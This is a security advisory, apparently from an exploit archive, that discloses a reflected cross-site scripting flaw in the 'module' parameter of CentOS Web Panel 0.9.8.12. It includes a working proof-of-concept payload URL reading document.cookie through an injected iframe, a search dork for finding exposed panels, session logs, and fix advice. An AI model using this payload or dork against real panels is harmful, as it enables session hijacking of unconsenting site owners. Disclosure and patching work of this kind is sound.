CentOS Web Panel v0.9.8.12 - Non-Persistent Cross Site Scripting Vulnerabilities

2018-01-20T00:00:00
ID 1337DAY-ID-29585
Type zdt
Reporter bot
Modified 2018-01-20T00:00:00

Description

Exploit for linux platform in category web applications

                                        
                                            Document Title:
===============
CentOS Web Panel v0.9.8.12 - Non-Persistent Cross Site Scripting Vulnerabilities


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
CentOS Web Panel - Free Web Hosting control panel is designed for quick and easy management of (Dedicated & VPS) 
servers without of 
need to use ssh console for every little thing. There is lot's of options and features for server management in this 
control panel.
CWP automatically installs full LAMP on your server (apache,php, phpmyadmin, webmail, mailserver…).

(Copy of the Homepage: http://centos-webpanel.com/features )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a client-side cross site scripting vulnerability in the 
CentOS Web Panel v0.9.8.12.


Vulnerability Disclosure Timeline:
==================================
2018-01-17: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
CWP
Product: CentOS Web Panel - (CWP) 0.9.8.12


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the official CentOS Web Panel v0.9.8.12.
The vulnerability allows remote attackers to inject script code to the client-side browser to application requests.

The client-side cross site web vulnerability is located in the `module` value of the `index.php` file GET method 
request.
The vulnerability can be exploited by remote attackers with a prepared malicious link to the centos web-panel 
application.
The request method to inject is GET and the attack vector is non-persistent. The injection point is the module 
parameter 
and the execution point occurs in the module exception.

The security risk of the web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) 
count of 3.3. 
Exploitation of the non-persisten vulnerability requires no privileged web-application user account and low user 
interaction. 
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, 
non-persistent 
external redirects to malicious source and non-persistent manipulation of affected or connected application modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] index.php

Vulnerable Parameter(s):
[+] module


Proof of Concept (PoC):
=======================
The cross site scripting vulnerability can be exploited by remote attackers without privileged web-application user 
account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to 
continue.


Dork(s):
"powered by CentOS-WebPanel.com"


PoC: Payload(s)
http://localhost:2030/index.php?module=clam%3E%22%3Ciframe%20src=evil.source%20onload=alert%28document.cookie%29%20%3C
http://localhost:2030/index.php?module=clam


PoC: Exception-Handling
<div class="row">
The module clam>"<[CLIENT SIDE SCRIPT CODE PAYLOAD EXECUTION!]> does not exist.      
                </div><!-- End .row -->
            </div><!-- End contentwrapper -->
        </div><!-- End #content -->
    </div><!-- End #wrapper -->


--- PoC Session Logs [POST] ---
Status: 200[OK]
GET http://localhost:2030/index.php?module=clam%3E%22%3Ciframesrc=evil.source%20onload=alert(document.cookie)%20%3C 
Mime Type[text/html]
   Request Header:
      Host[localhost:2030]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Cookie[cwpsrv-3cc0cea69668d490e1029c2a41ce5df3=8fnvi0bqgjj162mqklruu8clq5; PHPSESSID=8dsrha0ivd80kkgukvklgvmct1]
      Connection[keep-alive]
   Response Header:
      Server[Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips PHP/5.4.27]
      X-Powered-By[PHP/5.4.27]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Keep-Alive[timeout=5, max=100]
      Connection[Keep-Alive]
      Transfer-Encoding[chunked]
      Content-Type[text/html]


Reference(s):
http://localhost:2030/
http://localhost:2030/index.php
http://localhost:2030/index.php?module


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a sanitize of the vulnerable module parameters in the `index.php` file GET method 
request.
Disallow special chars and restrict the parameter input to prevent further client-side script code injection attacks.
Escape the output content of the error exception for invalid inputs to prevent the execution point of the client-side 
vulnerability.


Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability in the centos web panel is estimated as 
medium (CVSS 3.3).

#  0day.today [2018-03-19]  #